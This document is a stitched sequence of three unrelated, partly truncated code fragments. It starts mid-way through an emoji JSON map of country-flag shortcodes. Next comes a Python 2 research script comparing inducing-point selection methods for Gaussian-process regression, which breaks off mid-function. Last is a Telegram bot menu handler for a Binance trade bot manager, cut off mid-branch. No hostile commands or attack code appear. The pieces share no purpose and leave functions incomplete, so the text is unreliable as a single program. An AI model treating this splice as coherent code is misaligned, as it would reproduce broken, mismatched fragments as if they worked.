"unicode": "1f1ee-1f1e9"
},
":flag_ie:": {
"category": "flags",
"name": "ireland",
"unicode": "1f1ee-1f1ea"
},
":flag_il:": {
"category": "flags",
"name": "israel",
"unicode": "1f1ee-1f1f1"
},
":flag_im:": {
"category": "flags",
"name": "isle of man",
"unicode": "1f1ee-1f1f2"
},
":flag_in:": {
"category": "flags",
"name": "india",
"unicode": "1f1ee-1f1f3"
},
":flag_io:": {
"category": "flags",
"name": "british indian ocean territory",
"unicode": "1f1ee-1f1f4"
},
":flag_iq:": {
"category": "flags",
"name": "iraq",
"unicode": "1f1ee-1f1f6"
},
":flag_ir:": {
"category": "flags",
"name": "iran",
"unicode": "1f1ee-1f1f7"
},
":flag_is:": {
"category": "flags",
"name": "iceland",
"unicode": "1f1ee-1f1f8"
},
":flag_it:": {
"category": "flags",
"name": "italy",
"unicode": "1f1ee-1f1f9"
},
":flag_je:": {
"category": "flags",
"name": "jersey",
"unicode": "1f1ef-1f1ea"
},
":flag_jm:": {
"category": "flags",
"name": "jamaica",
"unicode": "1f1ef-1f1f2"
},
":flag_jo:": {
"category": "flags",
"name": "jordan",
"unicode": "1f1ef-1f1f4"
},
":flag_jp:": {
"category": "flags",
"name": "japan",
"unicode": "1f1ef-1f1f5"
},
":flag_ke:": {
"category": "flags",
"name": "kenya",
"unicode": "1f1f0-1f1ea"
},
":flag_kg:": {
"category": "flags",
"name": "kyrgyzstan",
"unicode": "1f1f0-1f1ec"
},
":flag_kh:": {
"category": "flags",
"name": "cambodia",
"unicode": "1f1f0-1f1ed"
},
":flag_ki:": {
"category": "flags",
"name": "kiribati",
"unicode": "1f1f0-1f1ee"
},
":flag_km:": {
"category": "flags",
"name": "the comoros",
"unicode": "1f1f0-1f1f2"
},
":flag_kn:": {
"category": "flags",
"name": "saint kitts and nevis",
"unicode": "1f1f0-1f1f3"
},
":flag_kp:": {
"category": "flags",
"name": "north korea",
"unicode": "1f1f0-1f1f5"
},
":flag_kr:": {
"category": "flags",
"name": "korea",
"unicode": "1f1f0-1f1f7"
},
":flag_kw:": {
"category": "flags",
"name": "kuwait",
"unicode": "1f1f0-1f1fc"
},
":flag_ky:": {
"category": "flags",
"name": "cayman islands",
"unicode": "1f1f0-1f1fe"
},
":flag_kz:": {
"category": "flags",
"name": "kazakhstan",
"unicode": "1f1f0-1f1ff"
},
":flag_la:": {
"category": "flags",
"name": "laos",
"unicode": "1f1f1-1f1e6"
},
":flag_lb:": {
"category": "flags",
"name": "lebanon",
"unicode": "1f1f1-1f1e7"
},
":flag_lc:": {
"category": "flags",
"name": "<NAME>",
"unicode": "1f1f1-1f1e8"
},
":flag_li:": {
"category": "flags",
"name": "liechtenstein",
"unicode": "1f1f1-1f1ee"
},
":flag_lk:": {
"category": "flags",
"name": "<NAME>",
"unicode": "1f1f1-1f1f0"
},
":flag_lr:": {
"category": "flags",
"name": "liberia",
"unicode": "1f1f1-1f1f7"
},
":flag_ls:": {
"category": "flags",
"name": "lesotho",
"unicode": "1f1f1-1f1f8"
},
":flag_lt:": {
"category": "flags",
"name": "lithuania",
"unicode": "1f1f1-1f1f9"
},
":flag_lu:": {
"category": "flags",
"name": "luxembourg",
"unicode": "1f1f1-1f1fa"
},
":flag_lv:": {
"category": "flags",
"name": "latvia",
"unicode": "1f1f1-1f1fb"
},
":flag_ly:": {
"category": "flags",
"name": "libya",
"unicode": "1f1f1-1f1fe"
},
":flag_ma:": {
"category": "flags",
"name": "morocco",
"unicode": "1f1f2-1f1e6"
},
":flag_mc:": {
"category": "flags",
"name": "monaco",
"unicode": "1f1f2-1f1e8"
},
":flag_md:": {
"category": "flags",
"name": "moldova",
"unicode": "1f1f2-1f1e9"
},
":flag_me:": {
"category": "flags",
"name": "montenegro",
"unicode": "1f1f2-1f1ea"
},
":flag_mf:": {
"category": "flags",
"name": "<NAME>",
"unicode": "1f1f2-1f1eb"
},
":flag_mg:": {
"category": "flags",
"name": "madagascar",
"unicode": "1f1f2-1f1ec"
},
":flag_mh:": {
"category": "flags",
"name": "the marshall islands",
"unicode": "1f1f2-1f1ed"
},
":flag_mk:": {
"category": "flags",
"name": "macedonia",
"unicode": "1f1f2-1f1f0"
},
":flag_ml:": {
"category": "flags",
"name": "mali",
"unicode": "1f1f2-1f1f1"
},
":flag_mm:": {
"category": "flags",
"name": "myanmar",
"unicode": "1f1f2-1f1f2"
},
":flag_mn:": {
"category": "flags",
"name": "mongolia",
"unicode": "1f1f2-1f1f3"
},
":flag_mo:": {
"category": "flags",
"name": "macau",
"unicode": "1f1f2-1f1f4"
},
":flag_mp:": {
"category": "flags",
"name": "northern mariana islands",
"unicode": "1f1f2-1f1f5"
},
":flag_mq:": {
"category": "flags",
"name": "martinique",
"unicode": "1f1f2-1f1f6"
},
":flag_mr:": {
"category": "flags",
"name": "mauritania",
"unicode": "1f1f2-1f1f7"
},
":flag_ms:": {
"category": "flags",
"name": "montserrat",
"unicode": "1f1f2-1f1f8"
},
":flag_mt:": {
"category": "flags",
"name": "malta",
"unicode": "1f1f2-1f1f9"
},
":flag_mu:": {
"category": "flags",
"name": "mauritius",
"unicode": "1f1f2-1f1fa"
},
":flag_mv:": {
"category": "flags",
"name": "maldives",
"unicode": "1f1f2-1f1fb"
},
":flag_mw:": {
"category": "flags",
"name": "malawi",
"unicode": "1f1f2-1f1fc"
},
":flag_mx:": {
"category": "flags",
"name": "mexico",
"unicode": "1f1f2-1f1fd"
},
":flag_my:": {
"category": "flags",
"name": "malaysia",
"unicode": "1f1f2-1f1fe"
},
":flag_mz:": {
"category": "flags",
"name": "mozambique",
"unicode": "1f1f2-1f1ff"
},
":flag_na:": {
"category": "flags",
"name": "namibia",
"unicode": "1f1f3-1f1e6"
},
":flag_nc:": {
"category": "flags",
"name": "new caledonia",
"unicode": "1f1f3-1f1e8"
},
":flag_ne:": {
"category": "flags",
"name": "niger",
"unicode": "1f1f3-1f1ea"
},
":flag_nf:": {
"category": "flags",
"name": "norfolk island",
"unicode": "1f1f3-1f1eb"
},
":flag_ng:": {
"category": "flags",
"name": "nigeria",
"unicode": "1f1f3-1f1ec"
},
":flag_ni:": {
"category": "flags",
"name": "nicaragua",
"unicode": "1f1f3-1f1ee"
},
":flag_nl:": {
"category": "flags",
"name": "the netherlands",
"unicode": "1f1f3-1f1f1"
},
":flag_no:": {
"category": "flags",
"name": "norway",
"unicode": "1f1f3-1f1f4"
},
":flag_np:": {
"category": "flags",
"name": "nepal",
"unicode": "1f1f3-1f1f5"
},
":flag_nr:": {
"category": "flags",
"name": "nauru",
"unicode": "1f1f3-1f1f7"
},
":flag_nu:": {
"category": "flags",
"name": "niue",
"unicode": "1f1f3-1f1fa"
},
":flag_nz:": {
"category": "flags",
"name": "new zealand",
"unicode": "1f1f3-1f1ff"
},
":flag_om:": {
"category": "flags",
"name": "oman",
"unicode": "1f1f4-1f1f2"
},
":flag_pa:": {
"category": "flags",
"name": "panama",
"unicode": "1f1f5-1f1e6"
},
":flag_pe:": {
"category": "flags",
"name": "peru",
"unicode": "1f1f5-1f1ea"
},
":flag_pf:": {
"category": "flags",
"name": "french polynesia",
"unicode": "1f1f5-1f1eb"
},
":flag_pg:": {
"category": "flags",
"name": "papua new guinea",
"unicode": "1f1f5-1f1ec"
},
":flag_ph:": {
"category": "flags",
"name": "the philippines",
"unicode": "1f1f5-1f1ed"
},
":flag_pk:": {
"category": "flags",
"name": "pakistan",
"unicode": "1f1f5-1f1f0"
},
":flag_pl:": {
"category": "flags",
"name": "poland",
"unicode": "1f1f5-1f1f1"
},
":flag_pm:": {
"category": "flags",
"name": "saint pierre and miquelon",
"unicode": "1f1f5-1f1f2"
},
":flag_pn:": {
"category": "flags",
"name": "pitcairn",
"unicode": "1f1f5-1f1f3"
},
":flag_pr:": {
"category": "flags",
"name": "puerto rico",
"unicode": "1f1f5-1f1f7"
},
":flag_ps:": {
"category": "flags",
"name": "palestinian authority",
"unicode": "1f1f5-1f1f8"
},
":flag_pt:": {
"category": "flags",
"name": "portugal",
"unicode": "1f1f5-1f1f9"
},
":flag_pw:": {
"category": "flags",
"name": "palau",
"unicode": "1f1f5-1f1fc"
},
":flag_py:": {
"category": "flags",
"name": "paraguay",
"unicode": "1f1f5-1f1fe"
},
":flag_qa:": {
"category": "flags",
"name": "qatar",
"unicode": "1f1f6-1f1e6"
},
":flag_re:": {
"category": "flags",
"name": "r\u00e9union",
"unicode": "1f1f7-1f1ea"
},
":flag_ro:": {
"category": "flags",
"name": "romania",
"unicode": "1f1f7-1f1f4"
},
":flag_rs:": {
"category": "flags",
"name": "serbia",
"unicode": "1f1f7-1f1f8"
},
":flag_ru:": {
"category": "flags",
"name": "russia",
"unicode": "1f1f7-1f1fa"
},
":flag_rw:": {
"category": "flags",
"name": "rwanda",
"unicode": "1f1f7-1f1fc"
},
":flag_sa:": {
"category": "flags",
"name": "saudi arabia",
"unicode": "1f1f8-1f1e6"
},
":flag_sb:": {
"category": "flags",
"name": "the solomon islands",
"unicode": "1f1f8-1f1e7"
},
":flag_sc:": {
"category": "flags",
"name": "the seychelles",
"unicode": "1f1f8-1f1e8"
},
":flag_sd:": {
"category": "flags",
"name": "sudan",
"unicode": "1f1f8-1f1e9"
},
":flag_se:": {
"category": "flags",
"name": "sweden",
"unicode": "1f1f8-1f1ea"
},
":flag_sg:": {
"category": "flags",
"name": "singapore",
"unicode": "1f1f8-1f1ec"
},
":flag_sh:": {
"category": "flags",
"name": "saint helena",
"unicode": "1f1f8-1f1ed"
},
":flag_si:": {
"category": "flags",
"name": "slovenia",
"unicode": "1f1f8-1f1ee"
},
":flag_sj:": {
"category": "flags",
"name": "svalbard and <NAME>",
"unicode": "1f1f8-1f1ef"
},
":flag_sk:": {
"category": "flags",
"name": "slovakia",
"unicode": "1f1f8-1f1f0"
},
":flag_sl:": {
"category": "flags",
"name": "<NAME>",
"unicode": "1f1f8-1f1f1"
},
":flag_sm:": {
"category": "flags",
"name": "<NAME>",
"unicode": "1f1f8-1f1f2"
},
":flag_sn:": {
"category": "flags",
"name": "senegal",
"unicode": "1f1f8-1f1f3"
},
":flag_so:": {
"category": "flags",
"name": "somalia",
"unicode": "1f1f8-1f1f4"
},
":flag_sr:": {
"category": "flags",
"name": "suriname",
"unicode": "1f1f8-1f1f7"
},
":flag_ss:": {
"category": "flags",
"name": "south sudan",
"unicode": "1f1f8-1f1f8"
},
":flag_st:": {
"category": "flags",
"name": "s\u00e3o tom\u00e9 and pr\u00edncipe",
"unicode": "1f1f8-1f1f9"
},
":flag_sv:": {
"category": "flags",
"name": "el salvador",
"unicode": "1f1f8-1f1fb"
},
":flag_sx:": {
"category": "flags",
"name": "<NAME>",
"unicode": "1f1f8-1f1fd"
},
":flag_sy:": {
"category": "flags",
"name": "syria",
"unicode": "1f1f8-1f1fe"
},
":flag_sz:": {
"category": "flags",
"name": "swaziland",
"unicode": "1f1f8-1f1ff"
},
":flag_ta:": {
"category": "flags",
"name": "tristan da cunha",
"unicode": "1f1f9-1f1e6"
},
":flag_tc:": {
"category": "flags",
"name": "turks and caicos islands",
"unicode": "1f1f9-1f1e8"
},
":flag_td:": {
"category": "flags",
"name": "chad",
"unicode": "1f1f9-1f1e9"
},
":flag_tf:": {
"category": "flags",
"name": "french southern territories",
"unicode": "1f1f9-1f1eb"
},
":flag_tg:": {
"category": "flags",
"name": "togo",
"unicode": "1f1f9-1f1ec"
},
":flag_th:": {
"category": "flags",
"name": "thailand",
"unicode": "1f1f9-1f1ed"
},
":flag_tj:": {
"category": "flags",
"name": "tajikistan",
"unicode": "1f1f9-1f1ef"
},
":flag_tk:": {
"category": "flags",
"name": "tokelau",
"unicode": "1f1f9-1f1f0"
},
":flag_tl:": {
"category": "flags",
"name": "timor-leste",
"unicode": "1f1f9-1f1f1"
},
":flag_tm:": {
"category": "flags",
"name": "turkmenistan",
"unicode": "1f1f9-1f1f2"
},
":flag_tn:": {
"category": "flags",
"name": "tunisia",
"unicode": "1f1f9-1f1f3"
},
":flag_to:": {
"category": "flags",
"name": "tonga",
"unicode": "1f1f9-1f1f4"
},
":flag_tr:": {
"category": "flags",
"name": "turkey",
"unicode": "1f1f9-1f1f7"
},
":flag_tt:": {
"category": "flags",
"name": "trinidad and tobago",
"unicode": "1f1f9-1f1f9"
},
":flag_tv:": {
"category": "flags",
"name": "tuvalu",
"unicode": "1f1f9-1f1fb"
},
":flag_tw:": {
"category": "flags",
"name": "the republic of china",
"unicode": "1f1f9-1f1fc"
},
":flag_tz:": {
"category": "flags",
"name": "tanzania",
"unicode": "1f1f9-1f1ff"
},
":flag_ua:": {
"category": "flags",
"name": "ukraine",
"unicode": "1f1fa-1f1e6"
},
":flag_ug:": {
"category": "flags",
"name": "uganda",
"unicode": "1f1fa-1f1ec"
},
":flag_um:": {
"category": "flags",
"name": "united states minor outlying islands",
"unicode": "1f1fa-1f1f2"
},
":flag_us:": {
"category": "flags",
"name": "united states",
"unicode": "1f1fa-1f1f8"
},
":flag_uy:": {
"category": "flags",
"name": "uruguay",
"unicode": "1f1fa-1f1fe"
},
":flag_uz:": {
"category": "flags",
"name": "uzbekistan",
"unicode": "1f1fa-1f1ff"
},
":flag_va:": {
"category": "flags",
"name": | |
<filename>examples/inducing_points/inducing_points.py
# -*- coding: utf-8 -*-
hlp = """
Comparison of the inducing point selection methods with varying noise rates
on a simple Gaussian Process signal.
"""
if __name__ == "__main__":
import matplotlib
matplotlib.use("Agg")
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import csv
import datetime
import os
import itertools as it
import time
import scipy
import numpy as np
import argparse
from scipy.stats import multivariate_normal as mvn, pearsonr, entropy
from mklaren.kernel.kernel import exponential_kernel, kernel_sum
from mklaren.kernel.kinterface import Kinterface
from mklaren.mkl.mklaren import Mklaren
from mklaren.regression.ridge import RidgeLowRank
from mklaren.regression.spgp import SPGP
from mklaren.projection.rff import RFF_KMP, RFF_TYP_NS, RFF_TYP_STAT
from mklaren.regression.ridge import RidgeMKL
from arima import Arima
import matplotlib.pyplot as plt
import pickle, gzip
# Hyperparameters
n_range = (100,) # Different numbers of data points
input_dim = 1 # Input dimension; generating a grid becomes intractable for input_dim > ~4 ...
rank_range = (3, 5,) # Ranks
lbd_range = (0,) # Regularization hyperparameter
gamma_range = [0.1, 0.3, 1, 3] # Exponentiated-quadratic kernel hyperparameters
pc = 0.1 # Pseudocount; prevents inf in KL-divergence.
repeats = 500 # Sampling repeats to compare distributions
# Method print ordering
meth_order = ["Mklaren", "Arima", "CSI", "ICD", "Nystrom", "RFF", "RFF-NS", "SPGP", "True"]
# Color mappings
meth2color = {"Mklaren": "green",
"CSI": "red",
"ICD": "blue",
"Nystrom": "pink",
"SPGP": "orange",
"RFF": "magenta",
"RFF-NS": "purple",
"Arima": "black",
"True": "black",
"l2krr": "green",
"align": "pink",
"uniform": "blue",
"alignf": "red",
"alignfc": "orange"}
def generate_data(n, rank,
inducing_mode="uniform", noise=1, gamma_range=(0.1,), seed=None,
input_dim=1, signal_sampling="GP", data="mesh"):
"""
Generate an artificial dataset with the given input dimension.
:param n: Number of data points.
:param rank: Number of inducing points.
:param inducing_mode: Biased or uniform sampling of inducing point locations.
:param noise: Noise variance.
:param gamma_range: Kernel hyperparameters; one kernel per value.
:param seed: Random seed.
:param input_dim: Input space dimension.
:param signal_sampling: 'GP' or 'weights'; 'weights' is more efficient.
:param data: 'mesh' or 'random'.
:return:
"""
if seed is not None:
np.random.seed(seed)
# Generate data for arbitrary input_dim
if data == "mesh":
x = np.linspace(-10, 10, n).reshape((n, 1))
M = np.meshgrid(*(input_dim * [x]))
X = np.array(zip(*[m.ravel() for m in M]))
N = X.shape[0]
xp = np.linspace(-10, 10, 100).reshape((100, 1))
Mp = np.meshgrid(*(input_dim * [xp]))
Xp = np.array(zip(*[m.ravel() for m in Mp]))
elif data == "random":
# Ensure data is separated at proper lengthscales
ls = SPGP.gamma2lengthscale(min(gamma_range)) / np.sqrt(input_dim)
a, b = -n * ls / 2.0, n * ls / 2.0
X = a + 2 * b * np.random.rand(n, input_dim)
N = X.shape[0]
Xp = np.random.rand(100, input_dim)
else:
raise ValueError("Unknown data mode: %s" % data)
# Kernel sum
Ksum = Kinterface(data=X, kernel=kernel_sum,
kernel_args={
"kernels": [exponential_kernel] * len(gamma_range),
"kernels_args": [{"gamma": g} for g in gamma_range]})
# Sum of kernels
Klist = [Kinterface(data=X, kernel=exponential_kernel, kernel_args={"gamma": g})
for g in gamma_range]
a = np.arange(X.shape[0], dtype=int)
if inducing_mode == "uniform":
p = None
elif inducing_mode == "biased":
af = np.sum(X + abs(X.min(axis=0)), axis=1)
p = (af ** 2 / (af ** 2).sum())
else:
raise ValueError(inducing_mode)
inxs = np.random.choice(a, p=p, size=rank, replace=False)
if signal_sampling == "GP":
Kny = Ksum[:, inxs].dot(np.linalg.inv(Ksum[inxs, inxs])).dot(Ksum[inxs, :])
f = mvn.rvs(mean=np.zeros((N,)), cov=Kny)
y = mvn.rvs(mean=f, cov=noise * np.eye(N, N))
elif signal_sampling == "weights":
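# Equivalent low-rank sampling via explicit features: L = K[:, I] K[I, I]^{-1/2} and f = L w with w ~ N(0, I), so cov(f) matches the Nystrom approximation above. Note the additive noise below is uniform rather than Gaussian.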
L = Ksum[:, inxs].dot(scipy.linalg.sqrtm(np.linalg.inv(Ksum[inxs, inxs])))
w = mvn.rvs(mean=np.zeros(rank,), cov=np.eye(rank, rank)).ravel()
f = L.dot(w)
y = f + np.random.rand(n, 1).ravel() * noise
else:
raise ValueError(signal_sampling)
return Ksum, Klist, inxs, X, Xp, y, f
def plot_signal(X, Xp, y, f, models=None, tit="", typ="plot_models", f_out = None):
"""
Plot fitted signal.
:param X: Sampling coordinates.
:param Xp: Plotting (whole signal) coordinates.
:param y: True observed values.
:param f: True signal.
:param models: One dictionary per model;
"yp" Predicted signal at yp.
"anchors" Anchor (inducing points coordinates), one set per lengthscale.
"color": Color.
"label": Name.
:param tit: Plot title.
:param typ: plot_models or plot_gammas
:return:
"""
# Plot signal
plt.figure()
x = X.ravel()
xp = Xp.ravel()
xmin, xmax = xp.min(), xp.max()
ymin, ymax = int(min(f.min(), y.min())) - 1, int(max(f.max(), y.max())) + 1
# Plot data
plt.plot(x, y, "k.")
plt.plot(x, f, "r--")
# Compute anchor ticks
P = max([1] + map(lambda m: len(m.get("anchors", [])), models.values()))
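# P is the largest number of anchor sets (one per lengthscale) over all models; it determines how many tick tracks are drawn below the signal.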
if typ == "plot_gammas":
Gxs = [np.linspace(xmin, xmax, 5 + 10 * g) for g in np.logspace(-1, 1, P)]
elif typ == "plot_models":
Gxs = [np.linspace(xmin, xmax, 15) for g in np.logspace(-1, 1, len(models))]
else:
raise ValueError
Gys = range(ymin - len(Gxs), ymin)
# Plot frequency scales
for gi, (gx, gy) in enumerate(zip(Gxs, Gys)):
plt.plot(gx, [gy] * len(gx), "|", color="gray")
# Plot multiple signals and anchors
if models is not None:
for mi, (label, data) in enumerate(models.items()):
if label == "True": continue
yp = data.get("yp", np.zeros((len(X), )))
color = meth2color[label]
plt.plot(xp, yp, "-", color=color, label="%s" % label)
for mi, (label, data) in enumerate(sorted(models.items(), key=lambda lb: lb[0] == "True")):
anchors = data.get("anchors", [[]])
color = meth2color[label]
if typ == "plot_gammas": # Draw for different gammas
for gi in range(P):
if len(anchors) <= gi or not len(anchors[gi]): continue
plt.plot(anchors[gi], [Gys[gi]] * len(anchors[gi]), "^",
color=color, markersize=8, alpha=0.6)
elif typ == "plot_models": # Draw for different methods
gi = mi
ancs = np.array(anchors).ravel()
plt.text(xmin - 1, Gys[gi], "[%s]" % label, horizontalalignment="right",
verticalalignment="center", color=meth2color[label])
plt.plot(ancs, [Gys[gi]] * len(ancs), "^",
color=color, markersize=8, alpha=0.6)
plt.title(tit)
plt.yticks(np.linspace(ymin, ymax, 2 * (ymax - ymin) + 1).astype(int))
plt.ylim((ymin - len(Gys) - 1, ymax))
plt.xlabel("Input space (x)")
plt.ylabel("Output space (y)")
plt.gca().yaxis.set_label_coords(-0.05, 0.75)
if f_out is None:
plt.show()
else:
plt.savefig(f_out)
plt.close()
print("Written %s" % f_out)
def plot_signal_subplots(X, Xp, y, f, models=None, f_out=None):
"""
Plot fitted signal on multiple plots to avoid clutter.
Models dictionary does not assume the 'True' model
:param X: Sampling coordinates.
:param Xp: Plotting (whole signal) coordinates.
:param y: True observed values.
:param f: True signal.
:param models: One dictionary per model;
"yp" Predicted signal at yp.
"anchors" Anchor (inducing points coordinates), one set per lengthscale.
"color": Color.
"label": Name.
:param f_out: Output file. If not provided, show plot on screen.
:return:
"""
x = X.ravel()
xp = Xp.ravel()
xmin, xmax = min(0, xp.min()), xp.max()
ymin, ymax = y.min(), y.max()
nmods = len(models)
fig, ax = plt.subplots(sharex=True, ncols=1, nrows=nmods, figsize=(4.33, nmods * 0.8))
for mi, (label, data) in enumerate(sorted(models.items(), key=lambda t: meth_order.index(t[0]))):
lbl = label.replace("Nystrom", "Nyström")
yp = data.get("yp", np.zeros((len(X),)))
color = meth2color[label]
# Plot to axis
ax[mi].set_xlim(xmin, xmax)
ax[mi].set_ylim(ymin, ymax)
ax[mi].plot(x, y, ".", color="gray")
if f is not None: ax[mi].plot(x, f, "r--")
ax[mi].plot(xp, yp, "-", color=color, label="%s" % label, linewidth=1.5)
# Plot anchors if provided
anchors = data.get("anchors", [[]])
ancs = np.array(anchors).ravel()
ax[mi].plot(ancs, [ymin + (ymax - ymin) * 0.05] * len(ancs),
"^", color=color, markersize=8, alpha=0.6)
ax[mi].set_ylabel(lbl)
ax[-1].set_xlabel("Input space (x)")
fig.tight_layout()
if f_out is None:
plt.show()
else:
plt.savefig(f_out)
plt.close()
print("Written %s" % f_out)
f_out_gz = f_out + ".pkl.gz"
obj = (X, Xp, y, f, models)
pickle.dump(obj, gzip.open(f_out_gz, "w"), protocol=pickle.HIGHEST_PROTOCOL)
print("Written %s" % f_out_gz)
def test(Ksum, Klist, inxs, X, Xp, y, f, delta=10, lbd=0.1, kappa=0.99,
methods=("Mklaren", "ICD", "CSI", "Nystrom", "SPGP")):
"""
Sample data from a Gaussian process and compare fits with the sum of kernels
versus list of kernels.
:param Ksum:
:param Klist:
:param inxs:
:param X:
:param Xp:
:param y:
:param f:
:param delta:
:param lbd:
:param methods:
:return:
"""
def flatten(l):
return [item for sublist in l for item in sublist]
P = len(Klist) # Number of kernels
rank = len(inxs) # Total number of inducing points over all lengthscales
anchors = X[inxs,]
# True results
results = {"True": {"anchors": anchors,
"color": "black"}}
# Fit MKL for kernel sum and
if "Mklaren" in methods:
mkl = Mklaren(rank=rank,
delta=delta, lbd=lbd)
t1 = time.time()
mkl.fit(Klist, y)
t2 = time.time() - t1
y_Klist = mkl.predict([X] * len(Klist))
yp_Klist = mkl.predict([Xp] * len(Klist))
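# Gather the inducing (active) indices selected by Mklaren for each kernel and flatten them into a single set of anchors.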
active_Klist = [flatten([mkl.data.get(gi, {}).get("act", []) for gi in range(P)])]
anchors_Klist = [X[ix] for ix in active_Klist]
try:
rho_Klist, _ = pearsonr(y_Klist, f)
except Exception as e:
rho_Klist = 0
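# Explained variance: the fraction of the variance of y captured by the in-sample predictions.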
evar = (np.var(y) - np.var(y - y_Klist)) / np.var(y)
results["Mklaren"] = {
"rho": rho_Klist,
"active": active_Klist,
"anchors": anchors_Klist,
"sol_path": mkl.sol_path,
"yp": yp_Klist,
"time": t2,
"evar": evar,
"model": mkl,
"color": meth2color["Mklaren"]}
# Fit CSI
if "CSI" in methods:
csi = RidgeLowRank(rank=rank, lbd=lbd,
method="csi", method_init_args={"delta": delta, "kappa": kappa},)
t1 = time.time()
csi.fit([Ksum], y)
t2 = time.time() - t1
y_csi = csi.predict([X])
yp_csi = csi.predict([Xp])
active_csi = csi.active_set_
anchors_csi = [X[ix] for ix in active_csi]
<filename>btb_manager_telegram/handlers.py<gh_stars>0
import json
import os
import shutil
import sqlite3
import subprocess
import sys
from configparser import ConfigParser
from telegram import Bot, ReplyKeyboardMarkup, ReplyKeyboardRemove, Update
from telegram.ext import (
CallbackContext,
CommandHandler,
ConversationHandler,
Filters,
MessageHandler,
)
from telegram.utils.helpers import escape_markdown
import i18n
from btb_manager_telegram import (
BOUGHT,
BUYING,
CUSTOM_SCRIPT,
DELETE_DB,
EDIT_COIN_LIST,
EDIT_USER_CONFIG,
MENU,
PANIC_BUTTON,
SELLING,
SOLD,
UPDATE_BTB,
UPDATE_TG,
buttons,
logger,
settings,
)
from btb_manager_telegram.binance_api_utils import send_signed_request
from btb_manager_telegram.utils import (
escape_tg,
find_and_kill_binance_trade_bot_process,
get_custom_scripts_keyboard,
i18n_format,
kill_btb_manager_telegram_process,
reply_text_escape,
telegram_text_truncator,
)
def menu(update: Update, _: CallbackContext) -> int:
logger.info(f"Menu selector. ({update.message.text})")
# Panic button disabled until PR #74 is complete
# keyboard = [
# [i18n_format('keyboard.current_value'), i18n_format('keyboard.current_ratios')],
# [i18n_format('keyboard.progress'), i18n_format('keyboard.trade_history')],
# [i18n_format('keyboard.check_status'), i18n_format('keyboard.panic')],
# [i18n_format('keyboard.maintenance'), i18n_format('keyboard.configurations')],
# ]
keyboard = [
[i18n_format("keyboard.current_value"), i18n_format("keyboard.progress")],
[i18n_format("keyboard.current_ratios"), i18n_format("keyboard.next_coin")],
[i18n_format("keyboard.check_status"), i18n_format("keyboard.trade_history")],
[i18n_format("keyboard.maintenance"), i18n_format("keyboard.configurations")],
]
config_keyboard = [
[i18n_format("keyboard.start"), i18n_format("keyboard.stop")],
[i18n_format("keyboard.read_logs"), i18n_format("keyboard.delete_db")],
[i18n_format("keyboard.edit_cfg"), i18n_format("keyboard.edit_coin_list")],
[i18n_format("keyboard.export_db"), i18n_format("keyboard.back")],
]
maintenance_keyboard = [
[i18n_format("keyboard.update_tgb")],
[i18n_format("keyboard.update_btb")],
[i18n_format("keyboard.execute_script")],
[i18n_format("keyboard.back")],
]
reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard=True)
reply_markup_config = ReplyKeyboardMarkup(config_keyboard, resize_keyboard=True)
reply_markup_maintenance = ReplyKeyboardMarkup(
maintenance_keyboard, resize_keyboard=True
)
# modify reply_text function to have it escaping characters
reply_text_escape_fun = reply_text_escape(update.message.reply_text)
if update.message.text == "/start":
logger.info("Started conversation.")
message = (
f"{i18n_format('conversation_started')}\n" f"{i18n_format('select_option')}"
)
settings.CHAT.send_message(
escape_tg(message), reply_markup=reply_markup, parse_mode="MarkdownV2"
)
if update.message.text in [
i18n_format("keyboard.back"),
i18n_format("keyboard.great"),
]:
reply_text_escape_fun(
i18n_format("select_option"),
reply_markup=reply_markup,
parse_mode="MarkdownV2",
)
elif update.message.text in [
i18n_format("keyboard.go_back"),
i18n_format("keyboard.ok"),
i18n_format("keyboard.configurations"),
]:
reply_text_escape_fun(
i18n_format("select_option"),
reply_markup=reply_markup_config,
parse_mode="MarkdownV2",
)
elif update.message.text in [
i18n_format("keyboard.maintenance"),
i18n_format("keyboard.cancel_update"),
i18n_format("keyboard.cancel"),
i18n_format("keyboard.ok_s"),
]:
reply_text_escape_fun(
i18n_format("select_option"),
reply_markup=reply_markup_maintenance,
parse_mode="MarkdownV2",
)
elif update.message.text == i18n_format("keyboard.current_value"):
for mes in buttons.current_value():
reply_text_escape_fun(
mes, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
elif update.message.text == i18n_format("keyboard.panic"):
message, status = buttons.panic_btn()
if status in [BOUGHT, BUYING, SOLD, SELLING]:
if status == BOUGHT:
kb = [
[i18n_format("keyboard.stop_sell")],
[i18n_format("keyboard.go_back")],
]
elif status in [BUYING, SELLING]:
kb = [
[i18n_format("keyboard.stop_cancel")],
[i18n_format("keyboard.go_back")],
]
elif status == SOLD:
kb = [[i18n_format("keyboard.stop")], [i18n_format("keyboard.go_back")]]
reply_text_escape_fun(
message,
reply_markup=ReplyKeyboardMarkup(kb, resize_keyboard=True),
parse_mode="MarkdownV2",
)
return PANIC_BUTTON
else:
reply_text_escape_fun(
message, reply_markup=reply_markup_config, parse_mode="MarkdownV2"
)
elif update.message.text == i18n_format("keyboard.progress"):
for mes in buttons.check_progress():
reply_text_escape_fun(
mes, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
elif update.message.text == i18n_format("keyboard.current_ratios"):
for mes in buttons.current_ratios():
reply_text_escape_fun(
mes, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
elif update.message.text == i18n_format("keyboard.next_coin"):
for mes in buttons.next_coin():
reply_text_escape_fun(
mes, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
elif update.message.text == i18n_format("keyboard.check_status"):
reply_text_escape_fun(
buttons.check_status(), reply_markup=reply_markup, parse_mode="MarkdownV2"
)
elif update.message.text == i18n_format("keyboard.trade_history"):
for mes in buttons.trade_history():
reply_text_escape_fun(
mes, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
elif update.message.text == i18n_format("keyboard.start"):
logger.info("Start bot button pressed.")
reply_text_escape_fun(
i18n_format("btb.starting"),
reply_markup=reply_markup_config,
parse_mode="MarkdownV2",
)
status = buttons.start_bot()
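# The integer status returned by start_bot() selects one of the messages below.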
message = [
i18n_format("btb.already_running"),
i18n_format("btb.started"),
i18n_format("btb.start_error"),
f"{i18n_format('btb.installation_path_error', path=settings.ROOT_PATH)}\n{i18n_format('btb.directory_hint')}",
f"{i18n_format('btb.lib_error', path=settings.PYTHON_PATH)}\n",
][status]
reply_text_escape_fun(
message,
reply_markup=reply_markup_config,
parse_mode="MarkdownV2",
)
elif update.message.text == i18n_format("keyboard.stop"):
reply_text_escape_fun(
buttons.stop_bot(),
reply_markup=reply_markup_config,
parse_mode="MarkdownV2",
)
elif update.message.text == i18n_format("keyboard.read_logs"):
